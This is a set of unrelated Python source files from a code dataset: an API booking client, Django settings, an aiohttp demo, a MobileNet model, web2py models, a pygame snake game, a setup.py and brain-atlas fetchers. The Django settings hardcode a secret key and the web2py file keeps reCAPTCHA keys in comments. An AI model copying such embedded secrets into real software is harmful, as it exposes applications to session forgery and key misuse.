trip_protection: Optional[bool] = None,\n source: Optional[str] = None,\n ) -> dict:\n \"\"\" Reserve a given unit\n\n Arguments:\n unit_id: A Vacasa Unit ID\n arrival: Checkin date in 'YYYY-MM-DD' format\n departure: Checkout date in 'YYYY-MM-DD' format\n email: User's email address\n phone: User's phone number\n address: User's address information, e.g.\n {\n 'address_1': '999 W Main St #301',\n 'city': 'Boise',\n 'state': 'ID',\n 'zip': '83702'\n }\n adults: How many adults will be staying\n children: How many children will be staying\n pets: How many pets will be staying\n trip_protection: Has the user requested trip protection?\n -1 No\n 0 TBD\n 1 Yes\n quote_id: ID of a quote retrieved from the `GET /quotes` endpoint\n first_name: User's First Name (for billing)\n last_name: User's Last Name (for billing)\n account_number: Credit card #\n exp_mmyy: Credit card expiry in `mmyy` format\n cvv: Card verification value on credit card\n source: A Vacasa-issued code identifying the source of this request\n\n Returns: dict\n\n \"\"\"\n\n url = f\"{self.endpoint}/v1/reservations\"\n headers = self._headers()\n payload = {\n 'unit_id': unit_id,\n 'arrival': arrival,\n 'departure': departure,\n 'email': email,\n 'phone': phone,\n 'address': address,\n 'adults': adults,\n 'children': children,\n 'pets': pets,\n 'trip_protection': trip_protection,\n 'quote_id': quote_id,\n 'first_name': first_name,\n 'last_name': last_name,\n 'account_number': account_number,\n 'exp_mmyy': exp_mmyy,\n 'source': source,\n }\n\n if phone is not None:\n payload['phone'] = phone\n\n payload['trip_protection'] = self._trip_protection_to_integer(trip_protection)\n\n if source is not None:\n payload['source'] = source\n\n if cvv:\n payload['cvv'] = str(cvv)\n\n return self._post(url, json={'data': {'attributes': payload}}, headers=headers).json()\n","sub_path":"vacasa/connect/connect.py","file_name":"connect.py","file_ext":"py","file_size_in_byte":21902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"275305171","text":"# -*- coding: utf-8 -*-\r\n\"\"\" =================================================\r\n -- file: translations/settings/base_settings.py\r\n -- site: Translations\r\n================================================= \"\"\"\r\n### -------------- Python packages -------------- ###\r\nimport os\r\n### -------------- Django packages -------------- ###\r\nfrom django.conf import global_settings\r\n### ----------- Third party packages ------------ ###\r\n### ----------- External app packages ----------- ###\r\n### ---------------- App packages --------------- ###\r\n\r\n\"\"\"======================= FILE PATH HELPERS ========================\"\"\"\r\n# here() gives us file paths from the root of the system to the directory holding the current file.\r\nhere = lambda * x: os.path.join(os.path.abspath(os.path.dirname(__file__)), *x)\r\n\r\n# Define project root\r\nPROJECT_ROOT = here(\"..\", \"..\")\r\n\r\n# root() gives us file paths from the root of the system to whatever\r\n# folder(s) we pass it starting at the parent directory of the current file.\r\nroot = lambda * x: os.path.join(os.path.abspath(PROJECT_ROOT), *x)\r\n\r\n\"\"\"======================= ADMINISTRATORS ========================\"\"\"\r\nADMINS = (\r\n ('Laszlo Bekessy', 'laszlo.bekessy@gmail.com'),\r\n)\r\nMANAGERS = ADMINS\r\n\r\n\"\"\"======================= SECRET KEY ========================\"\"\"\r\nSECRET_KEY = 'lq&9y*56qvc0!qns=h0-2@@%%r5pmqg7$*8)fd)fa@w0e4=p8y'\r\n\r\n\"\"\"======================= TIMEZONE AND LANGUAGES ========================\"\"\"\r\nTIME_ZONE = 'Europe/Budapest'\r\nUSE_TZ = True\r\nUSE_I18N = True\r\nUSE_L10N = True\r\nLOCALE_PATHS = (\r\n root(\"locale\"),\r\n)\r\n\r\n\"\"\"======================= MEDIA ROOT AND URL ========================\"\"\"\r\nMEDIA_ROOT = root(\"uploads\")\r\nMEDIA_URL = '/uploads/'\r\n\r\n\"\"\"======================= STATIC AND TEMPLATE RELATED ========================\"\"\"\r\nSTATIC_ROOT = root(\"static\")\r\nSTATIC_URL = '/static/'\r\nSTATICFILES_DIRS = (\r\n root(\"assets\"),\r\n)\r\n\r\nSTATICFILES_FINDERS = (\r\n 'django.contrib.staticfiles.finders.FileSystemFinder',\r\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\r\n 'dajaxice.finders.DajaxiceFinder',\r\n)\r\n\r\nTEMPLATES = [\r\n {\r\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\r\n 'DIRS': [],\r\n 'APP_DIRS': True,\r\n 'OPTIONS': {\r\n 'context_processors': [\r\n 'django.template.context_processors.debug',\r\n 'django.template.context_processors.request',\r\n 'django.contrib.auth.context_processors.auth',\r\n 'django.contrib.messages.context_processors.messages',\r\n 'social.apps.django_app.context_processors.backends',\r\n 'social.apps.django_app.context_processors.login_redirect',\r\n 'translations.processor.global_context',\r\n ],\r\n },\r\n },\r\n]\r\n\r\n\"\"\"======================= MIDDLEWARES ========================\"\"\"\r\nMIDDLEWARE_CLASSES = (\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.middleware.locale.LocaleMiddleware',\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.middleware.csrf.CsrfViewMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\r\n 'django.contrib.messages.middleware.MessageMiddleware',\r\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\r\n 'django.middleware.security.SecurityMiddleware',\r\n 'translations.middleware.TranslationsMiddleware',\r\n 'translations.middleware.SocialAuthCancelMiddleware'\r\n)\r\n\r\n\"\"\"======================= APPS ========================\"\"\"\r\nLOCAL_APPS = (\r\n 'translations',\r\n 'projects',\r\n)\r\n\r\nTHIRD_PARTY_APPS = (\r\n 'dajaxice',\r\n 'grappelli',\r\n 'rosetta',\r\n 'intercom',\r\n 'social.apps.django_app.default',\r\n)\r\n\r\nDJANGO_APPS = (\r\n 'django.contrib.admin',\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.messages',\r\n 'django.contrib.staticfiles',\r\n)\r\n\r\n# Don't change the order, otherwise grappelli doesn't work\r\nINSTALLED_APPS = LOCAL_APPS + THIRD_PARTY_APPS + DJANGO_APPS\r\n\r\n\"\"\"======================= BASE CONFIG ========================\"\"\"\r\nROOT_URLCONF = 'translations.urls'\r\nWSGI_APPLICATION = 'wsgi.wsgi.application'\r\nDEFAULT_CHARSET = 'utf-8'\r\n\r\n\"\"\"======================= AUTH RELATED ========================\"\"\"\r\nAUTHENTICATION_BACKENDS = (\r\n 'social.backends.facebook.FacebookOAuth2',\r\n 'social.backends.google.GoogleOAuth2',\r\n 'django.contrib.auth.backends.ModelBackend',\r\n)\r\n\r\nLOGIN_URL = '/'\r\nLOGIN_ERROR_URL = '/'\r\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = '/user_setup'\r\nSOCIAL_AUTH_USER_MODEL = 'auth.User'\r\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = ['username', 'first_name', 'email']\r\n\r\n\"\"\"======================= LOGGING ========================\"\"\"\r\nLOGGING = {\r\n 'version': 1,\r\n 'disable_existing_loggers': True,\r\n 'formatters': {\r\n 'standard': {\r\n 'format': \"{\"\r\n \"\\\"time\\\": \\\"%(asctime)s\\\", \"\r\n \"\\\"level\\\": \\\"%(levelname)s\\\", \"\r\n \"\\\"message\\\": \\\"%(message)s\\\"}\",\r\n 'datefmt': \"%d/%b/%Y-%H:%M:%S\"\r\n },\r\n },\r\n 'filters': {\r\n 'require_debug_false': {\r\n '()': 'django.utils.log.RequireDebugFalse'\r\n }\r\n },\r\n 'handlers': {\r\n 'null': {\r\n 'level':'DEBUG',\r\n 'class':'django.utils.log.NullHandler',\r\n },\r\n 'logfile': {\r\n 'level':'INFO',\r\n 'class':'logging.handlers.RotatingFileHandler',\r\n 'filename': root(\"logs\") + \"/logfile.log\",\r\n 'maxBytes': 5000000,\r\n 'backupCount': 25,\r\n 'formatter': 'standard',\r\n },\r\n 'console':{\r\n 'level':'INFO',\r\n 'class':'logging.StreamHandler',\r\n 'formatter': 'standard'\r\n },\r\n 'mail_admins': {\r\n 'level': 'ERROR',\r\n 'filters': ['require_debug_false'],\r\n 'class': 'django.utils.log.AdminEmailHandler'\r\n }\r\n },\r\n 'loggers': {\r\n 'django': {\r\n 'handlers':['console'],\r\n 'propagate': True,\r\n 'level':'WARN',\r\n },\r\n 'django.request': {\r\n 'handlers': ['mail_admins'],\r\n 'level': 'ERROR',\r\n 'propagate': False,\r\n },\r\n 'django.db.backends': {\r\n 'handlers': ['console'],\r\n 'level': 'DEBUG',\r\n 'propagate': False,\r\n },\r\n 'translations': {\r\n 'handlers': ['logfile'],\r\n 'level': 'INFO',\r\n },\r\n }\r\n}\r\n\r\n\"\"\"======================= TESTING ========================\"\"\"\r\nTEST_RUNNER = 'django.test.runner.DiscoverRunner'\r\n","sub_path":"translations/settings/base_settings.py","file_name":"base_settings.py","file_ext":"py","file_size_in_byte":6763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516245076","text":"from aiohttp import web\n\n# describes routes by decorators\nroutes = web.RouteTableDef()\n\n# for localhost:8080/ -->\n# Async Server in Python 3.7\n@routes.get('/')\nasync def handler(request):\n return web.Response(text='Async Server in Python 3.7')\n\n\n# for localhost:8080/Java -->>\n# The programming language entered was: Java\n@routes.get('/{language}')\nasync def return_language(request):\n lang = request.match_info.get('language', '')\n return web.Response(text=f'The programming language entered was: {lang}')\n\n# another way to pass info with url is to pass key-value pairs\n# for localhost:8080/Java?other=what -->>\n# The programming language entered was: Java\n# Other info: what\n@routes.get('/ok/{language}')\nasync def return_language(request):\n lang = request.match_info.get('language', '')\n other_info = request.rel_url.query.get('other', '')\n return web.Response(text=f'''\n The programming language entered was: {lang}\n Other info: {other_info}\n ''')\n\n\n@routes.post('/add_lang')\nasync def add_lang(request):\n print(\"hello\")\n data = await request.post()\n lang = data.get('language')\n return web.Response(text=f'{lang} was added to database')\n\n\nasync def initialization():\n app = web.Application()\n app.add_routes(routes)\n return app\n\n\n# app = web.Application()\n# # this way async functions can be plugged in to the web application\n# app.add_routes([web.get('/', handler)])\n# # alternative way to register routes is to use decorators and add them\n# at the start of handler coroutines\n# web.run_app(app)\nweb.run_app(initialization())\n","sub_path":"src/async-sync/async-client-server/async-server.py","file_name":"async-server.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"403729475","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport tensorflow as tf\n\n\nclass MobileNet:\n\t\"\"\"\n\tThis is the MobileNet main class which will be used to do the image classification\n\t\"\"\"\n\n\tdef __init__(self, input, trainable):\n\t\tself.input = input\n\t\tself.trainable = trainable\n\t\tself.outputs = self.__build_network__()\n\n\tdef separable_conv_block(self, input, dw_filter, output_channel, strides, name):\n\t\t\"\"\"\n\t\tThis method defines the structure for one downsample of the input\n\t\t:param input: The input to the unit\n\t\t:param dw_filter: The size of the filter\n\t\t:param output_channel: The number of channels in output\n\t\t:param strides: The stride of the filter\n\t\t:param name: The name of the layer\n\t\t:return: The output after the layer\n\t\t\"\"\"\n\t\twith tf.variable_scope(name):\n\t\t\t# We firstly find the weights for the layer by random initialization\n\t\t\tdepthwise_weight = tf.get_variable(name = 'dw_filter', dtype = tf.float32, trainable = True,\n\t\t\t shape = dw_filter,\n\t\t\t initializer = tf.random_normal_initializer(stddev = 0.01))\n\t\t\t# Here we find the output of the depthwise convolution\n\t\t\tdepthwise_output = tf.nn.depthwise_conv2d(input = input, filter = depthwise_weight, strides = strides,\n\t\t\t padding = \"SAME\", name = 'Conv/depthwise_output')\n\t\t\t# Now we do the batch_wise normalization of the output to reduce effect of exploding and diminishing\n\t\t\t# gradient\n\t\t\tbatch_normalization_depthwise = tf.layers.batch_normalization(depthwise_output,\n\t\t\t beta_initializer = tf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer =\n\t\t\t tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'depthwise_output/bn')\n\t\t\t# Now we take the rectified Linear Unit activation of the output\n\t\t\trelu = tf.nn.leaky_relu(batch_normalization_depthwise, 0.1)\n\t\t\t# Now we get the weight for the 2d convolution\n\t\t\tweight = tf.get_variable(name = 'weight', dtype = tf.float32, trainable = True,\n\t\t\t shape = (1, 1, dw_filter[2] * dw_filter[3], output_channel),\n\t\t\t initializer = tf.random_normal_initializer(stddev = 0.01))\n\n\t\t\tconv = tf.nn.conv2d(input = relu, filter = weight, strides = [1, 1, 1, 1], padding = \"SAME\",\n\t\t\t name = \"conv/s1\")\n\t\t\tbatch_normalization_2d_conv = tf.layers.batch_normalization(conv, beta_initializer =\n\t\t\ttf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer =\n\t\t\t tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'pt/bn')\n\t\t\treturn tf.nn.leaky_relu(batch_normalization_2d_conv, 0.1)\n\n\tdef __build_network__(self):\n\t\t\"\"\"\n\t\tThis function helps to build the network\n\t\t:return: The values of the output\n\t\t\"\"\"\n\t\twith tf.variable_scope('MobileNet'):\n\t\t\tconvolution_1 = tf.layers.conv2d(self.input,\n\t\t\t filters = 32,\n\t\t\t kernel_size = (3, 3),\n\t\t\t strides = (2, 2),\n\t\t\t padding = 'same',\n\t\t\t activation = tf.nn.relu,\n\t\t\t name = 'convolution_1'\n\t\t\t )\n\t\t\tbatch_normalized_output_1 = tf.layers.batch_normalization(convolution_1,\n\t\t\t beta_initializer = tf.zeros_initializer(),\n\t\t\t gamma_initializer = tf.ones_initializer(),\n\t\t\t moving_mean_initializer = tf.zeros_initializer(),\n\t\t\t moving_variance_initializer =\n\t\t\t tf.ones_initializer(),\n\t\t\t training = self.trainable,\n\t\t\t name = 'bn')\n\t\t\tx = self.separable_conv_block(input = batch_normalized_output_1, dw_filter = (3, 3, 32, 1),\n\t\t\t output_channel = 64,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_1\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 64, 1), output_channel = 128,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_2\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 128, 1), output_channel = 128,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_3\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 128, 1), output_channel = 256,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_4\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 256, 1), output_channel = 256,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_5\")\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 256, 1), output_channel = 512,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_6\")\n\n\t\t\tfor i in range(5):\n\t\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 512, 1), output_channel = 512,\n\t\t\t\t strides = (1, 1, 1, 1), name = \"downsample_%d\" % (i + 7))\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 512, 1), output_channel = 1024,\n\t\t\t strides = (1, 2, 2, 1), name = \"downsample_12\")\n\n\t\t\tx = self.separable_conv_block(input = x, dw_filter = (3, 3, 1024, 1), output_channel = 1024,\n\t\t\t strides = (1, 1, 1, 1), name = \"downsample_13\")\n\t\treturn x\n","sub_path":"mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"422019185","text":"db = DAL('sqlite://storage.sqlite')\nfrom gluon.tools import Auth\nauth = Auth(db) #secure=True\nauth.define_tables(username=True)\n\n#db.auth_user.password.requires=IS_STRONG()\n#fr#om gluon.tools import Recaptcha\n#auth.settings.captcha = Recaptcha(request,\n # '6LcD0PESAAAAAAv8xXDZS_g39KeqDKVhdpw5Ui3B',\n # '6LcD0PESAAAAACBYOTT1juQXfClchb_QP8BuXCOZ')\n\ndb.define_table('Restaurants',\n Field('name','string',required=True,requires=IS_LOWER()), \n Field('area',required=True,requires=IS_LOWER()),\n Field('city',required=True,requires=IS_LOWER()),\n Field('address','string',requires=IS_NOT_EMPTY()),\n Field('cuisine','string',requires=IS_NOT_EMPTY()), \n Field('comments'),\n Field('images','upload'))\n\ndb.Restaurants.name.requires=IS_NOT_EMPTY()\ndb.Restaurants.area.requires=IS_NOT_EMPTY()\ndb.Restaurants.city.requires=IS_NOT_EMPTY()\n\ndb.define_table('Comments',Field('comment','string',requires=IS_NOT_EMPTY()),\n Field('user','string',readable=False,writable=False),\n Field('rid','integer',readable=False,writable=False),\n Field('table_name','string',readable=False,writable=False))\n\ndb.define_table('Images',\n Field('image','upload',requires=IS_NOT_EMPTY()),\n Field('user','string',readable=False,writable=False),\n Field('rid','integer',readable=False,writable=False))\n\ndb.define_table('Movie_Halls',\n Field('name','string',required=True,requires=IS_LOWER()),\n Field('area',required=True,requires=IS_LOWER()),\n Field('city','string',required=True,requires=IS_LOWER()),\n Field('comments','string'),\n Field('location','string',required=True,requires=IS_NOT_EMPTY()),\n Field('images','upload'))\n\ndb.Movie_Halls.name.requires=IS_NOT_EMPTY()\ndb.Movie_Halls.area.requires=IS_NOT_EMPTY()\ndb.Movie_Halls.city.requires=IS_NOT_EMPTY()\n\n","sub_path":"BKG/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"627895810","text":"# for func_best_model\nfrom ..utils.best_model import best_model, activate_model\n\n# for func_evaluate\nimport warnings\nfrom tqdm import tqdm\nfrom numpy import mean, std\nimport numpy as np\n\nfrom ..commands.evaluate import Evaluate\n\n\ndef func_best_model(scan_object, metric='val_acc', asc=False):\n\n '''Picks the best model based on a given metric and\n returns the index number for the model.\n\n NOTE: for loss 'asc' should be True'''\n\n warnings.simplefilter('ignore')\n\n model_no = best_model(scan_object, metric, asc)\n out = activate_model(scan_object, model_no)\n\n return out\n\n\ndef func_evaluate(scan_object,\n x_val,\n y_val,\n n=10,\n metric='val_acc',\n folds=5,\n shuffle=True,\n average='binary',\n asc=False):\n\n '''\n For creating scores from kfold cross-evaluation and\n adding them to the data frame.\n\n '''\n\n warnings.simplefilter('ignore')\n\n picks = scan_object.data.sort_values(metric,\n ascending=asc).index.values[:n]\n\n if n > len(scan_object.data):\n data_len = len(scan_object.data)\n else:\n data_len = n\n\n out = []\n\n pbar = tqdm(total=data_len)\n\n for i in range(len(scan_object.data)):\n\n if i in list(picks):\n evaluate_object = Evaluate(scan_object)\n temp = evaluate_object.evaluate(x_val, y_val,\n model_id=i,\n metric=metric,\n folds=folds,\n shuffle=shuffle,\n asc=asc)\n out.append([mean(temp), std(temp)])\n pbar.update(1)\n else:\n out.append([np.nan, np.nan])\n\n pbar.close()\n\n scan_object.data['eval_f1score_mean'] = [i[0] for i in out]\n scan_object.data['eval_f1score_std'] = [i[1] for i in out]\n","sub_path":"talos/scan/scan_addon.py","file_name":"scan_addon.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"210934026","text":"import pygame\nimport random\n#pylint: disable=no-member\n#pylint: disable=too-many-function-args\n\npygame.init()\n\nscreen = pygame.display.set_mode((800, 600))\npygame.display.set_caption('Snake')\nbackground = pygame.image.load('res/grass.png')\n\n\n########################################## Snake ##########################################\n\nclass Snake:\n def __init__(self):\n self.size = 1\n self.elements = [[100, 100]]\n self.radius = 10\n self.dx, self.dy = 2 * self.radius, 0 # right\n self.add = False\n\n def draw(self):\n for element in self.elements:\n pygame.draw.circle(screen, (255, 0, 200), element, self.radius)\n\n def move(self):\n self.elements.insert(\n 0, [self.elements[0][0] + self.dx, self.elements[0][1] + self.dy])\n if not self.add:\n self.elements.pop()\n else:\n self.size += 1\n self.add = False\n\n def randomNotInSnake(self):\n x = random.randint(1, 37) * 20 + 10\n y = random.randint(1, 27) * 20 + 10\n if [x + 10, y + 10] in self.elements:\n return self.randomNotInSnake()\n else:\n return [x, y]\n\n def checkCollisions(self):\n global done\n global gameOver\n if self.elements[0] in self.elements[1:]:\n done = True\n gameOver = True\n\n if not (32 < self.elements[0][0] < screen.get_width() - 32 and 32 < self.elements[0][1] < screen.get_height() - 32):\n done = True\n gameOver = True\n\n\n########################################## Walls ##########################################\n\nclass Walls:\n def __init__(self):\n self.image = pygame.image.load('res/wall.png')\n self.h = self.image.get_height()\n self.w = self.image.get_width()\n\n def draw(self):\n for i in range(screen.get_width() // self.w + 1):\n screen.blit(self.image, (i*self.w, 0))\n screen.blit(self.image, (i*self.w, screen.get_height() - self.h))\n\n for i in range(screen.get_height() // self.h + 1):\n screen.blit(self.image, (0, i*self.h))\n screen.blit(self.image, (screen.get_width() - self.w, i*self.h))\n\n\n########################################## Food ##########################################\n\n\nclass Food:\n def __init__(self):\n self.image = pygame.image.load('res/apple.png')\n self.x, self.y = 210, 210\n\n def draw(self):\n screen.blit(self.image, (self.x, self.y))\n\n\ndef isEaten(snake, food):\n dist_x = snake.elements[0][0] - food.x - snake.radius\n dist_y = snake.elements[0][1] - food.y - snake.radius\n if -snake.radius * 2 < dist_x < food.image.get_width() and -snake.radius * 2 < dist_y < food.image.get_height():\n return True\n else:\n return False\n\n\ndef drawScore(score):\n font = pygame.font.SysFont('Courier', 24, bold=True)\n text = font.render(f'Score: {score}', True, (0, 0, 0))\n screen.blit(text, (screen.get_width() - text.get_width() - 20, 10))\n\n########################################## Init ##########################################\n\n\nsnake = Snake()\nwalls = Walls()\nfood = Food()\n\ndone = False\ngameOver = False\n\nd = 20\nFPS = 10\nclock = pygame.time.Clock()\n\n########################################## Main loop ##########################################\n\nfont = pygame.font.SysFont('Courier', 48, bold=True)\nstart_text = font.render('Press space to start', True, (0, 0, 0))\nscreen.blit(background, (0, 0))\nscreen.blit(start_text, (screen.get_width() // 2 - start_text.get_width() // 2,\n screen.get_height() // 2 - start_text.get_height() // 2))\npygame.display.flip()\n\nwhile not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if pygame.key.get_pressed()[pygame.K_SPACE]:\n break\n\nwhile not done:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n done = True\n if event.key == pygame.K_RIGHT and snake.dx != -d:\n snake.dx = d\n snake.dy = 0\n if event.key == pygame.K_LEFT and snake.dx != d:\n snake.dx = -d\n snake.dy = 0\n if event.key == pygame.K_UP and snake.dy != d:\n snake.dx = 0\n snake.dy = -d\n if event.key == pygame.K_DOWN and snake.dy != -d:\n snake.dx = 0\n snake.dy = d\n\n snake.move()\n snake.checkCollisions()\n if isEaten(snake, food):\n snake.add = True\n food.x, food.y = snake.randomNotInSnake()\n\n screen.blit(background, (0, 0))\n food.draw()\n snake.draw()\n walls.draw()\n drawScore(snake.size - 1)\n\n pygame.display.flip()\n\n\nif gameOver:\n end_text = font.render(f'Game Over. Score: {snake.size - 1}', True, (0, 0, 0))\n screen.blit(background, (0, 0))\n screen.blit(end_text, (screen.get_width() // 2 - end_text.get_width() // 2,\n screen.get_height() // 2 - end_text.get_height() // 2))\n pygame.display.flip()\n\n sec = 0\n while sec < 3:\n sec += clock.tick(30) / 1000\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sec = 3\n\npygame.quit()\n","sub_path":"Pygame/Projects/Yernur's Snake/snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":5410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"126900456","text":"import distutils\nimport os.path\n\nfrom setuptools import setup\nfrom setuptools.command.install import install as _install\n\n\nclass install(_install):\n def initialize_options(self):\n _install.initialize_options(self)\n # Use this prefix to get loaded as early as possible\n name = 'aaaaaa_deliverymethod'\n\n contents = 'import sys; import deliverymethod\\n'\n self.extra_path = (name, contents)\n\n def finalize_options(self):\n _install.finalize_options(self)\n\n install_suffix = os.path.relpath(\n self.install_lib, self.install_libbase,\n )\n if install_suffix == '.':\n distutils.log.info('skipping install of .pth during easy-install')\n elif install_suffix == self.extra_path[1]:\n self.install_lib = self.install_libbase\n distutils.log.info(\n \"will install .pth to '%s.pth'\",\n os.path.join(self.install_lib, self.extra_path[0]),\n )\n else:\n raise AssertionError(\n 'unexpected install_suffix',\n self.install_lib, self.install_libbase, install_suffix,\n )\n\n\nsetup(cmdclass={'install': install})\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"319908840","text":"\"\"\"\n\"\"\"\nimport pandas as pd\nfrom os.path import join\n\nfrom sklearn.datasets.base import Bunch\nfrom nilearn import datasets\nfrom nilearn.datasets.utils import _get_dataset_dir, _fetch_files\n\n\ndef _check_atlases(atlas_names):\n \"\"\"Check that the atlases provided are valid names, string or\n list of strings, otherwise raise an error.\n \"\"\"\n valid_atlases = ['harvard_oxford', 'destrieux', 'diedrichsen',\n 'juelich', 'jhu', 'mist']\n err_msg = (\"You provided atlas name(s) {0} which is \"\n \"not valid. Provide in {1}\")\n\n if isinstance(atlas_names, str):\n atlas_names = [atlas_names, ]\n\n for name in atlas_names:\n if name not in valid_atlases:\n raise ValueError(err_msg.format(name, valid_atlases))\n return atlas_names\n\n\ndef _fetch_atlas_diedrichsen(atlas_name):\n \"\"\"Cerebellum atlas registered to MNI with FNIRT\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['prob-1mm', 'prob-2mm', 'maxprob-thr50-1mm', 'maxprob-thr50-2mm',\n 'maxprob-thr25-1mm', 'maxprob-thr25-2mm', 'maxprob-thr0-1mm',\n 'maxprob-thr0-2mm']\n\n Returns\n -------\n maps : str\n Path to cerebellum atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'Cerebellum-MNIfnirt-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/Cerebellum/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/Cerebellum_MNIfnirt.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef _fetch_atlas_juelich(atlas_name):\n \"\"\"Juelich atlas\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['maxprob-thr0-1mm', 'maxprob-thr0-2mm',\n 'maxprob-thr25-1mm', 'maxprob-thr25-2mm', 'maxprob-thr50-1mm',\n 'maxprob-thr50-2mm', 'prob-1mm', 'prob-2mm']\n\n Returns\n -------\n maps : str\n Path to Juelich atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'Juelich-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/Juelich/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/Juelich.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef _fetch_atlas_jhu(atlas_name):\n \"\"\"John Hopkins University atlas\n\n Parameters\n ----------\n atlas_name : str\n Anyone could be from a list\n ['labels-1mm', 'labels-2mm']\n\n Returns\n -------\n maps : str\n Path to JHU atlas\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n atlas_name = 'JHU-ICBM-{0}.nii.gz'.format(atlas_name)\n labels_img = join('/usr/local/fsl/data/atlases/JHU/',\n atlas_name)\n label_file = '/usr/local/fsl/data/atlases/JHU-labels.xml'\n names = {}\n from xml.etree import ElementTree\n names[0] = 'Background'\n for label in ElementTree.parse(label_file).findall('.//label'):\n names[int(label.get('index')) + 1] = label.text\n names = list(names.values())\n return Bunch(maps=labels_img, labels=names)\n\n\ndef fetch_mist():\n \"\"\"Download MIST parcellation n=122\n https://mniopenresearch.org/articles/1-3\n\n Returns\n -------\n maps : str\n Path to MIST parcellation\n\n labels : list of str\n Anatomical labels assigned to each label\n \"\"\"\n url = 'https://ndownloader.figshare.com/files/9811081'\n opts = {'uncompress': True}\n data_dir = _get_dataset_dir('mist', data_dir=None,\n verbose=1)\n files = [(join('Release', 'Parcel_Information', 'MIST_122.csv'),\n url, opts),\n (join('Release', 'Parcellations', 'MIST_122.nii.gz'),\n url, opts)]\n files = _fetch_files(data_dir, files, resume=True, verbose=1)\n parcel_info = pd.read_csv(files[0], sep=';')\n names = parcel_info['name']\n df = pd.DataFrame(['Background'], columns=['name'])\n for i in range(names.shape[0]):\n df2 = pd.DataFrame([names[i]], columns=['name'])\n df = df.append(df2, ignore_index=True)\n return Bunch(maps=files[1], labels=df)\n\n\ndef fetch_atlases(atlas_names):\n \"\"\"Fetch atlases provided by name(s)\n\n Parameters\n ----------\n atlas_names : str or list of str\n Grab atlas from web given the name. Few are shipped with FSL\n and Nilearn.\n Valid options: ['harvard_oxford', 'destrieux', 'diedrichsen',\n 'juelich', 'jhu', 'mist']\n\n Returns\n -------\n data : dict\n Bunch of atlases\n 